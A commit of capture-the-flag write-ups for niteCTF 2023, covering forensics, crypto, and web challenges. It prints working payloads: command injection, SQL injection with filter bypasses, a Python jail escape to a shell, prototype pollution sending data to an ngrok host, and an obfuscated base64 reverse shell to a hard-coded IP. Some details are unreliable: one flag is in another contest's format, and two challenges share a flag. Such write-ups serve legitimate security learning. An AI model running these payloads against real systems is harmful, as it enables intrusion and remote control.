feat: added niteCTF 2023

niteCTF 2023/Amour Plastique/README.md

@@ -0,0 +1,16 @@
+# Amour Plastique
+> It seems the intruder likes to hack in style. Analysis reveals the hacker was listening to a playlist while destroying the admin's system. Surely they might have left their tracks. Use dump2 to investigate.
+
+> cheval de troie will be visible after solving this challenge.
+
+## About the Challenge
+We were given a dump memory file called `dump2.mem` and we need to find the song that was heard by the hacker
+
+## How to Solve?
+In this case im using `strings` and `grep` to get the flag
+
+![flag](images/flag.png)
+
+```
+nite{8_bit_synths}
+```

niteCTF 2023/DecryptaQuest/README.md

@@ -0,0 +1,30 @@
+# DecryptaQuest
+> Embark on a silent adventure between a web browser and server. No clues, just mystery. Good luck, detective of the unknown!
+
+> "Flag format : NITE{FLAG}"
+
+## About the Challenge
+We were given a pcapng file (You can download the file [here](Decryta_logs.pcapng)). The pcapng contains some TLS traffic here
+/Users/daffainfo/Downloads/download.log
+
+![preview](images/preview.png)
+
+## How to Solve?
+There's an interesting encoded base64 message in stream 13
+![stream33](images/stream13.png)
+
+I copied the msg and then use cyberchef to decode it
+
+![base64](images/base64.png)
+
+This is a `SSLKEYLOGFILE`, this file will be useful to decrypt TLS / SSL traffic in Wireshark. First, save this file and then import it in wireshark
+
+![import](images/import.png)
+
+And you can get the flag by checking one of the HTTP request
+
+![flag](images/flag.png)
+
+```
+NITE{FLWAEDSSL123}
+```

niteCTF 2023/ERaaS/README.md

@@ -0,0 +1,18 @@
+# ERaaS
+> Emergency response? Afraid not
+
+## About the Challenge
+We were given a website without the source code, where the website only has one functionality: converting the epoch to date.
+
+![preview](images/preview.png)
+
+## How to Solve?
+The website is vulnerable to OS Command Injection through the addition of `;` after the epoch, followed by the command you want to execute
+
+![ls](images/ls.png)
+
+![flag](images/flag.png)
+
+```
+HackTM{Timisoara}
+```

niteCTF 2023/German shell/README.md

@@ -0,0 +1,49 @@
+# German shell
+> Do you have an Albert Einstein in you? If not you better find one cuz you gonna need em else you gunna faint rottin
+
+> /var/quantumLava/flag.txt
+
+## About the Challenge
+We were given a server to connect without any attachment, and in this server we can execute bash command but the output is a little bit weird
+
+![preview](images/preview.png)
+
+## How to Solve?
+After trying some random comments, I just realize there's a "pattern"
+
+![testing](images/testing.png)
+
+As we can see here, the program will reverse the results of our input and also substract -1 to each character we input. For example here, i want to execute `cat` command:
+
+```
+1. Reverse cat -> tac
+2. Minus -1 character for every character
+t - 0 = t
+a - 1 = z
+c - 2 = a
+3. To execute `cat`, we need to input `tac`
+```
+
+But this doesn't apply to special character because they always changed the character every second
+
+![special characters](images/special-char.png)
+
+And to read the flag, luckily the program didn't change character `?` every second so the final payload will looks like this
+
+```
+????????/???????????/???/ hr
+```
+
+Means I want to execute
+
+```
+sh /???/???????????/????????
+```
+
+![flag](images/flag.png)
+
+> we need to input this command multiple times because the program change `/` into a random character
+
+```
+nite{tr7n517t10n_u51ng_t1m3_n0t_c001_00000yx}
+```

niteCTF 2023/Image Gallery/README.md

@@ -0,0 +1,57 @@
+# Image Gallery
+> View your photo gallery using our super Secure image gallery. we offer free 1 terabyte of storage of high-Quality images, showcased in a personalized custom aLbum.
+
+## About the Challenge
+We were given a website and a source code (You can download the source code [here](imagegal.zip)). This website only has 1 functionality which is login user
+
+![preview](images/preview.png)
+
+## How to Solve?
+If we analyze the source code, it looks like the website is vulnerable to SQL injection but there are a lot of filter here
+
+```python
+@app.route("/login", methods=["POST", "GET"])
+def login():
+    if "logged_in" in session and session["logged_in"]:
+        session.pop("logged_in", None)
+        return redirect(url_for("login"))
+
+    if request.method == "POST":
+        username = request.form["username"]
+        password = request.form["password"]
+        loweruser = username.lower()
+        lowerpass = password.lower()
+        invalid_entries = invalid_entries = [
+            "=", "<", ">", "+", "//", "|", ";", " ", " ", "'1", " 1", " true", "'true", " or", "'or", "/or", " and", "'and", "/and", "'like", " like", "/like", "'where", " where", "/where", "%00", "null", "admin'",
+        ]
+```
+
+But we can bypass it using `tab` instead of `space`
+
+![sqli](images/sqli.png)
+
+But the flag is not found in the dashboard. If you analyze the sql file, there's a column called `secret`, and to get the secret value im using this payload
+
+```
+'	union	select	secret	from	login_details	where	password	like	"%"--
+```
+
+![cookie](images/cookie.png)
+
+Ummm, the cookie value suddenly become so big. Decode it using `flask-unsign` and we got this base64 value
+
+```
+eyJmbGFnIjoibml0ZXtpc190aGlzX3RoZV9mbGFnP30iLCJuYW1lIjoiVHJ5IGFuZCBnZXQgdGhlIGZsYWchIiwiZGVzYyI6IihmdW5jdGlvbihfMHhkOGZiZGIsXzB4MjQyNDgzKXt2YXIgXzB4NTVkYzdjPV8weDNlN2QsXzB4M2FlZmExPV8weGQ4ZmJkYigpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4M2Q3ODQ3PS1wYXJzZUludChfMHg1NWRjN2MoMHg5MikpLzB4MSoocGFyc2VJbnQoXzB4NTVkYzdjKDB4OTYpKS8weDIpK3BhcnNlSW50KF8weDU1ZGM3YygweDhlKSkvMHgzKigtcGFyc2VJbnQoXzB4NTVkYzdjKDB4OTMpKS8weDQpK3BhcnNlSW50KF8weDU1ZGM3YygweDk0KSkvMHg1K3BhcnNlSW50KF8weDU1ZGM3YygweDhmKSkvMHg2KigtcGFyc2VJbnQoXzB4NTVkYzdjKDB4OGIpKS8weDcpK3BhcnNlSW50KF8weDU1ZGM3YygweDkxKSkvMHg4Ky1wYXJzZUludChfMHg1NWRjN2MoMHg4YykpLzB4OSoocGFyc2VJbnQoXzB4NTVkYzdjKDB4OTUpKS8weGEpK3BhcnNlSW50KF8weDU1ZGM3YygweDkwKSkvMHhiO2lmKF8weDNkNzg0Nz09PV8weDI0MjQ4MylicmVhaztlbHNlIF8weDNhZWZhMVsncHVzaCddKF8weDNhZWZhMVsnc2hpZnQnXSgpKTt9Y2F0Y2goXzB4NGIyODljKXtfMHgzYWVmYTFbJ3B1c2gnXShfMHgzYWVmYTFbJ3NoaWZ0J10oKSk7fX19KF8weDQ0ZTcsMHhiNGJmMSkpO2Z1bmN0aW9uIF8weDNlN2QoXzB4M2JjYTMzLF8weDIxZjY0OCl7dmFyIF8weDQ0ZTc3Yz1fMHg0NGU3KCk7cmV0dXJuIF8weDNlN2Q9ZnVuY3Rpb24oXzB4M2U3ZGU2LF8weDMxZmViYyl7XzB4M2U3ZGU2PV8weDNlN2RlNi0weDhiO3ZhciBfMHg1ZTU4NTA9XzB4NDRlNzdjW18weDNlN2RlNl07cmV0dXJuIF8weDVlNTg1MDt9LF8weDNlN2QoXzB4M2JjYTMzLF8weDIxZjY0OCk7fWZ1bmN0aW9uIHd1dF9pc190aGlzX25vdygpe3ZhciBfMHg1OTQ5NTY9XzB4M2U3ZDtjb25zb2xlWydsb2cnXShfMHg1OTQ5NTYoMHg4ZCkpO31mdW5jdGlvbiBfMHg0NGU3KCl7dmFyIF8weDQ1ZDA4ZT1bJzlsbENnTm8nLCdhSFIwY0hNNkx5OW5hWFJvZFdJdVkyOXRMMmx6YUdGdUxYTjFjbUZ1WVM5amFHRnNiR1Z1WjJVdicsJzkyNG9mb3BKQicsJzE1NzA5OHR0REd2YScsJzI0MjU3Mjc3YW1kc2RZJywnNDY1NzY4MFdhaWNKRCcsJzh4SHRxc2QnLCcxNjI1Mld6cWZjcycsJzExOTg3OTVlVUFmSUQnLCc0MDI1MTEwR1hveWJNJywnNzk2ODJRU254c1MnLCc4NHhCSnNzdyddO18weDQ0ZTc9ZnVuY3Rpb24oKXtyZXR1cm4gXzB4NDVkMDhlO307cmV0dXJuIF8weDQ0ZTcoKTt9IiwiaWF0IjoxNTE2MjM5MDIyfQ
+```
+
+Decode it and you will got a obfuscated javascript code
+
+![base64](images/base64.png)
+
+Deobfuscate the JS, and there's a github link that contains the flag
+
+![flag](images/flag.png)
+
+```
+nite{k33ping_up_w1th_+he_time5}
+```

niteCTF 2023/LiteLibrary/README.md

@@ -0,0 +1,37 @@
+# LiteLibrary
+> Testing in prod. No worries are long as we are lighte :)
+
+## About the Challenge
+We were given a website without the source code, and this website only has 1 functionality which is search book
+
+![preview](images/preview.png)
+
+## How to Solve?
+the first vulnerability that comes to my mind is SQL injection. First, I tried UNION-based SQL injection:
+
+```
+' UNION SELECT 1,2,3,4,5-- -
+```
+
+![sqli](images/sqli.png)
+
+And then i tried to dump the table structure using this payload
+
+```
+' UNION SELECT 1,2,3,(SELECT sql FROM sqlite_schema limit),5-- -
+```
+
+There are 2 tables here:
+
+* CREATE TABLE BOOKS (title TEXT, author TEXT, pages TEXT, imageLink TEXT, link TEXT)
+* CREATE TABLE USERS (liteId TEXT, liteUsername TEXT, gender TEXT, liteNick TEXT, litePass TEXT, dateCreated TEXT)
+
+![table](images/table.png)
+
+And then dump everything using `group_concat()` function and we can get the flag inside `liteNick` columns
+
+![flag](images/flag.png)
+
+```
+nite{t00_l1t3_huh_50m30n3_g37_an71_g2av17y_0v3r_h3r3}
+```

niteCTF 2023/Matryoshka/README.md

@@ -0,0 +1,128 @@
+# Matryoshka
+> : I think we should have a matryoshka challenge..
+
+> : Sure! Go ahead.
+
+> : Let's make it different this time. HEhe!
+
+> : *-+
+
+## About the Challenge
+We were given a txt file containing a base64 encoded message
+
+## How to Solve?
+First we need to decode the encoded text with some steps:
+* Base64
+* Hex
+* Decimal
+* Hex
+
+![decode](images/decode.png)
+
+And we got an image! Now, I tried to upload the image to Aperisolve and used `foremost` to extract a file inside the image. And we got 3 files here:
+
+* The original image
+* Another png file
+* A zip file
+
+When I opened the zip file, it turns out this file is useless.
+
+![zip](images/zip.png)
+
+And then i tried to analyze the `.png` file, after using `binwalk`, `foremost`, `LSB steganography`, etc. sadly I got nothing here. But when I used `Extract RGBA` options (CyberChef), we got another image again!
+
+![rgba](images/rgba.png)
+
+I uploaded the image to Aperisolve and there's a zip archive file inside the image
+
+![arc-gunzip](images/arc-gunzip.png)
+
+Inside the zip file, there is a file called `arc.tar.gz` and if you `gunzip` it, you got a compiled binary file
+
+![exec-file](images/exec-file.png)
+
+Reverse engineer the code and there's a hex code inside of it
+
+![elf](images/elf.png)
+
+Assemble the hex data then insert them into CyberChef and you got a `class` file
+
+![class](images/class.png)
+
+Decompile the file, and you got this java program
+
+```java
+import java.util.ArrayList;
+import java.util.Collections;
+import java.util.HashMap;
+
+public class nite {
+   public static String convertString(String var0) {
+      ArrayList var1 = new ArrayList();
+      char[] var2 = var0.toCharArray();
+      int var3 = var2.length;
+
+      int var4;
+      for(var4 = 0; var4 < var3; ++var4) {
+         char var5 = var2[var4];
+         var1.add(var5);
+      }
+
+      Collections.shuffle(var1);
+      HashMap var9 = new HashMap();
+      char[] var10 = var0.toCharArray();
+      var4 = var10.length;
+
+      int var13;
+      for(var13 = 0; var13 < var4; ++var13) {
+         char var6 = var10[var13];
+         var9.put(var6, (Character)var1.remove(0));
+      }
+
+      StringBuilder var11 = new StringBuilder();
+      char[] var12 = var0.toCharArray();
+      var13 = var12.length;
+
+      for(int var14 = 0; var14 < var13; ++var14) {
+         char var7 = var12[var14];
+         char var8 = (Character)var9.getOrDefault(var7, var7);
+         var11.append(var8);
+      }
+
+      return var11.toString();
+   }
+
+   private static String convert(String var0) {
+      StringBuilder var1 = new StringBuilder();
+
+      for(int var2 = 0; var2 < var0.length(); var2 += 2) {
+         String var3 = var0.substring(var2, var2 + 2);
+         int var4 = Integer.parseInt(var3, 16);
+         var1.append((char)var4);
+      }
+
+      return var1.toString();
+   }
+
+   public static void main(String[] var0) {
+      String var1 = "686d6d5f6c34793372355f";
+      String var2 = "76335f7734795f3730305f6d346e79";
+      String var3 = "6e6974657b315f6834";
+      String var4 = "5f64306c6c355f6e30775f";
+      String var5 = "30665f6c3166335f69677d";
+      String var6 = convert(var3 + var2 + var4 + var1 + var5);
+      String var7 = convertString(var6);
+      System.out.println("1_h4t3_str1ng_m4n1pul4710n_1n_java: " + var7);
+   }
+}
+```
+
+Remove the `convert()` and `convertString()` command and you got the final hex code
+
+![hex-flag](images/hex-flag.png)
+
+![flag](images/flag.png)
+
+```
+nite{1_h4v3_w4y_700_m4ny_d0ll5_n0w_hmm_l4y3r5_0f_l1f3_ig}
+```

niteCTF 2023/Mini Survey/README.md

@@ -0,0 +1,78 @@
+# Mini Survey
+> Please answer this survey for the better of all
+
+> - Minnesota Dept of Roads & Railways
+
+## About the Challenge
+We were given a website and a source code (You can download the source code [here](miniSurvery_updated_2.zip)). This website has 2 functionality:
+
+* Submit pollution survey
+* Submit road quality survey
+
+![preview](images/preview.png)
+
+## How to Solve?
+If we look at the source code, the `sendData` function in JavaScript prepares data, configures backup server details, and sends the data to a server. It checks if the server's host ends with ".ngrok.io" and, if true, establishes a TCP connection to the server using the specified host and port. 
+
+```javascript
+function sendData(data) {
+    const postData = JSON.stringify(data);
+
+    if (data.host != undefined) {
+        backupServerHost = data.host;
+    }
+
+    if (data.port != undefined) {
+        backupServerPort = data.port;
+    }
+
+    const options = {
+        host: backupServerHost || "localhost",
+        port: backupServerPort || "8888",
+    };
+
+    if (
+        typeof options.host === "string" &&
+        options.host.endsWith(".ngrok.io")
+    ) {
+        const socket = net.connect(options, () => {
+            socket.write(postData);
+            socket.end();
+        });
+
+        socket.on("error", (err) => {
+            console.error("Error", err.message);
+        });
+    }
+}
+```
+
+So we need to set the `option.host` and `option.port` variable to our ngrok server. But to do that, we need to do prototype pollution first 
+
+```javascript
+app.post("/pollutionsurvey", (req, res) => {
+    let fieldInput1 = req.body.name;
+    let fieldInput2 = req.body.city;
+    let fieldInput3 = req.body.pollutionRate;
+
+    surveyOneInitialData[fieldInput1] = { [fieldInput2]: fieldInput3 };
+
+    surveyOneInitialData = updateDBs(surveyOneInitialData, {
+        Name: { City: "Rating" },
+    });
+
+    res.redirect("/thankyou");
+});
+```
+
+To do prototype pollution we need to fill `__proto__` in the parameter `name`. Here is the request I sent to the server to set `host` and `port` to our ngrok server
+
+![prototype-pollution](images/prototype-pollution.png)
+
+And then check our server again, the flag will be reflected like this
+
+![flag](images/flag.png)
+
+```
+nite{pr0t0_p0llut3d_116a4601b79d6b8f}
+```

niteCTF 2023/README.md

@@ -0,0 +1,19 @@
+# niteCTF 2023
+CTF writeup for The niteCTF 2023. I took part in this CTF competition (Solo) and secured the 10th place out of 326 teams
+
+| Category | Challenge |
+| --- | --- |
+| Web | [ERaaS](/niteCTF%202023/ERaaS/)
+| Web | [caas renewed](/niteCTF%202023/caas%20renewed/)
+| Web | [LiteLibrary](/niteCTF%202023/LiteLibrary/)
+| Web | [Image Gallery](/niteCTF%202023/Image%20Gallery/)
+| Web | [Mini Survey](/niteCTF%202023/Mini%20Survey/)
+| Incident Response | [conqueror](/niteCTF%202023/conqueror/)
+| Incident Response | [coup de réseau](/niteCTF%202023/coup%20de%20réseau/)
+| Incident Response | [Amour Plastique](/niteCTF%202023/Amour%20Plastique/)
+| Incident Response | [cheval de troie](/niteCTF%202023/cheval%20de%20troie/)
+| Forensic | [Matryoshka](/niteCTF%202023/Matryoshka/)
+| Misc | [blindjail](/niteCTF%202023/blindjail/)
+| Misc | [DecryptaQuest](/niteCTF%202023/DecryptaQuest/)
+| Reverse Engineering | [German shell](/niteCTF%202023/German%20shell/)
+| Cryptography | [babyRSA](/niteCTF%202023/babyRSA/)

niteCTF 2023/babyRSA/README.md

@@ -0,0 +1,66 @@
+# babyRSA
+> RSA in haystack
+
+## About the Challenge
+We were given a python script called `encrypt.py` and `output.txt` (You can download the output [here](output.txt)). Here is the content of `encrypt.py`
+
+```python
+from Crypto.Util.number import getPrime, bytes_to_long
+from secret import FLAG
+
+m = bytes_to_long(FLAG)
+f = open ('output.txt', 'w')
+e = 37
+n = [getPrime(1024)*getPrime(1024) for i in range(e)]
+c = [pow(m, e, n[i]) for i in range(e)]
+
+with open ('output.py', 'w'):
+    f.write(f"e = {e}\n")
+    f.write(f"c = {c}\n")
+    f.write(f"n = {n}\n")
+```
+
+This RSA encryption is vulnerable to `Hastad Broadcast Attack`
+
+## How to Solve?
+In this case i created a script to solve this problem
+
+```python
+from Crypto.Util.number import inverse, long_to_bytes
+import gmpy2
+
+def hastad_broadcast_attack(e, c, n):
+    # Apply Hastad's Broadcast Attack
+    M = 1
+    for modulus in n:
+        M *= modulus
+
+    result = 0
+    for i in range(len(n)):
+        Mi = M // n[i]
+        Mi_inv = inverse(Mi, n[i])
+        result += c[i] * Mi * Mi_inv
+
+    result = result % M
+
+    # Use gmpy2 for nth root
+    m = int(gmpy2.iroot(result, e)[0])
+
+    return long_to_bytes(m)
+
+# Load the values from the file
+with open('output.txt', 'r') as f:
+    exec(f.read())
+
+# Perform the Hastad's Broadcast Attack
+recovered_message = hastad_broadcast_attack(e, c, n)
+print("Recovered Message:", recovered_message.decode())
+```
+
+Run the program and voilà!
+
+![flag](images/flag.png)
+
+```
+nite{y0u_C@n_N3v3r_Gu3s5!!!}
+```

niteCTF 2023/babyRSA/encrypt.py

@@ -0,0 +1,14 @@
+from Crypto.Util.number import getPrime, bytes_to_long
+from secret import FLAG
+
+m = bytes_to_long(FLAG)
+f = open ('output.txt', 'w')
+e = 37
+n = [getPrime(1024)*getPrime(1024) for i in range(e)]
+c = [pow(m, e, n[i]) for i in range(e)]
+
+with open ('output.py', 'w'):
+    f.write(f"e = {e}\n")
+    f.write(f"c = {c}\n")
+    f.write(f"n = {n}\n")
+

niteCTF 2023/blindjail/README.md

@@ -0,0 +1,22 @@
+# blindjail
+> There is no escape, sometimes going in blind makes other attributes stronger.
+
+## About the Challenge
+We were given a server to connect where we can execute a python code (Classic PyJail) but there are some filter like we can't use `exec()` or `eval()` function 
+
+![Alt text](images/preview.png)
+
+## How to Solve?
+I tried several function and luckily the program didn't blacklist `breakpoint()` function. So the final payload will be like this
+
+```python
+breakpoint()
+...
+import os
+os.system("sh")
+```
+![Alt text](images/flag.png)
+
+```
+nitectf{sl1d3_0ver_th3se_4ttribut3s}
+```

niteCTF 2023/caas renewed/README.md

@@ -0,0 +1,24 @@
+# caas renewed
+> moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo etc moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo etc moo moo moo moo moo etc moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo moo etc moo moo moo moo etc/cowsay/falg.txt
+
+## About the Challenge
+We were given a website without the source code (IDK why they added the attachment after me and some teams solved this chall)
+
+![preview](images/preview.png)
+
+This website will displays our input
+
+## How to Solve?
+This website is also vulnerable to OS command injection but there are a lot of restriction, but in this case I will execute a reverse shell command. Here is the payload I used to do reverse shell
+
+```
+lala;echo${IFS}YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xNDMuMTk4LjgxLjE4Ni85OTk5IDA%2BJjE=|ba$@se64${IFS}-d|ba$@sh
+```
+
+Using `$@` to bypass restricted command and `${IFS}` to bypass whitespace
+
+![flag](images/flag.png)
+
+```
+nite{9wd_t0_th3_r35cu3_dp54kf_ud9j3od3w}
+```

niteCTF 2023/cheval de troie/README.md

@@ -0,0 +1,26 @@
+# cheval de troie
+> After accessing our private network, the hacker skillfully maneuvered through files, leaving behind a virtual trail of mystery. We managed to capture the packets, exposing the encrypted breadcrumbs scattered across the network. Before slipping away into the digital abyss, the intruder left a deliberate hint—a cryptic message that conceals the essence of their next move. Decrypt the message and unveil the obscured 'crypto' to thwart their cunning plan.
+
+> Taupe will be visible after this challenge
+
+## About the Challenge
+We were given a `pcapng` file (You can download the file [here](initial-report.pcapng)). And here is the preview of the packet capture file
+
+![preview](images/preview.png)
+
+## How to Solve?
+There's an interesting encoded base64 message in stream 33
+
+![stream33](images/stream33.png)
+
+I copied the msg and then use cyberchef to decode it
+
+![base64](images/base64.png)
+
+Reverse engineer the program to obtain th eflag
+
+![flag](images/flag.png)
+
+```
+nite{networkxoxo}
+```

niteCTF 2023/conqueror/README.md

@@ -0,0 +1,30 @@
+# conqueror
+> Our company is dealing with a possible case of corporate espionage. The credentials of one of our systems were changed and it was used to gain access to our internal network.
+
+> Help us gain access to the system before its too late.
+
+> Memory Dump Link: https://drive.google.com/file/d/14MWp-UtVPAcu1hEyv1_xBhpdO3nIrEBo/view?usp=sharing
+
+> Flag Format: nite{user_password}
+
+> coup de réseau will be visible after solving this challenge.
+
+## About the Challenge
+We were given a memory dump file and we need to get the user and password
+
+## How to Solve?
+To solve this challenge, we can use `volatility3` and then run this command to dump the user and the MD5 hash.
+
+```bash
+vol -f dump1.mem windows.hashdump.Hashdump
+```
+
+![hash](images/hash.png)
+
+Crack the MD5 hash using bruteforce attack, or you can try to put these hashes into cracker online like https://crackstation.net
+
+![crack](images/crack.png)
+
+```
+nite{napoleon_shorty}
+```

niteCTF 2023/coup de réseau/README.md

@@ -0,0 +1,18 @@
+# coup de réseau
+> Too late. The network admin's system was compromised and we can't access our network anymore. Investigate the memory dump.
+
+> Memory Dump Link: https://drive.google.com/file/d/1LbElkzno-FophYpkTLPL5ic2BnZgn-UN/view?usp=sharing
+
+> Amour Plastique will be visible after solving this challenge.
+
+## About the Challenge
+We were given a dump memory file called `dump2.mem` and we need investigate the memory dump file
+
+## How to Solve?
+In this case im using `strings` and `grep` to get the flag
+
+![flag](images/flag.png)
+
+```
+nite{8_bit_synths}
+```